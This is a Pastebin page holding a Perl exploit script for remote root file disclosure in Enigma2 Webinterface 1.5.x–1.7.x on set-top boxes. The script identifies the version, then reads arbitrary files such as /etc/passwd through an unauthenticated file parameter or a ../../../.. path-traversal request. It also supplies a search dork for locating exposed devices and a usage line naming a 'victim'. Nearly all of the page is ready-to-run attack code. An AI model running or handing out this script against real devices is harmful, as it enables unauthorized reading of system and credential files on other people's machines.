Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/perl
- #
- # Enigma2 Webinterface 1.7.x 1.6.x 1.5.x remote root file disclosure exploit
- ##
- # Author: Todor Donev
- # Email me: todor.donev@@gmail.com
- # Platform: Linux
- # Type: remote
- ##
- # Gewgle Dork: "Enigma2 movielist" filetype:rss
- ##
- #
- # Enigma2 is a framebuffer-based zapping application (GUI) for linux.
- # It's targeted to real set-top-boxes, but would also work on regular PCs.
- # Enigma2 is based on the Python programming language with a backend
- # written in C++. It uses the [LinuxTV DVB API], which is part of a standard linux kernel.
- #
- # Enigma2 can also be controlled via an Enigma2:WebInterface.
- ##
- # Thanks to Tsvetelina Emirska !!
- ##
- # http://www.ethical-hacker.org/
- # https://www.facebook.com/ethicalhackerorg
- #
- use LWP::Simple;
- $t = $ARGV[0];
- if(! $t) {usg();}
- $d = $ARGV[1];
- if(! $d) {$d = "/etc/passwd";}
- my $r = get("http://$t/web/about") or exit;
- print "[+] Enigma2 Webinterface 1.7.x 1.6.x 1.5.x remote exploit\n";
- print "[+] Target: $t\n";
- if ($r =~ m/<e2webifversion>(.*)<\/e2webifversion>/g){
- print "[+] Image Version: $1\n";
- }
- if ($r =~ (m/1.6.0|1.6.1|1.6.2|1.6.3|1.6.4|1.6.5|1.6.6|1.6.7|1.6.8|1.6rc3|1.7.0/i)){
- print "[+] Exploiting Enigma2 via type1 (file?file=$d)\n";
- result(exploit1());
- }
- if ($r =~ (m/1.5rc1|1.5beta4/i)){
- print "[+] Exploiting Enigma2 via type2 (file/?file=../../../..$d)\n";
- result(exploit2());
- }
- sub usg{
- print "\n[+] Enigma2 Webinterface 1.7.x 1.6.x 1.5.x remote exploit\n";
- print "[+] Usage: perl enigma2.pl <victim> </path/file>\n";
- exit;
- }
- sub exploit1{
- my $x = get("http://$t/file?file=$d");
- }
- sub exploit2{
- my $x = get("http://$t/file/?file=../../../..$d");
- }
- sub result{
- my $x= shift;
- while(defined $x){
- print "$x\n";
- print "[+] I got it 4 cheap.. =)\n";
- exit;
- }}
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement